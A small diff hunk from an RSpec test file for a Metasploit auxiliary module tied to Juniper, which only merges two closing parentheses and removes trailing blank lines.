@@ -600,11 +765,7 @@ RSpec.describe Msf::Auxiliary::Juniper do
                   }
                }
            }
-       )
-      )
+       ))
     end
-
   end
-
-
 end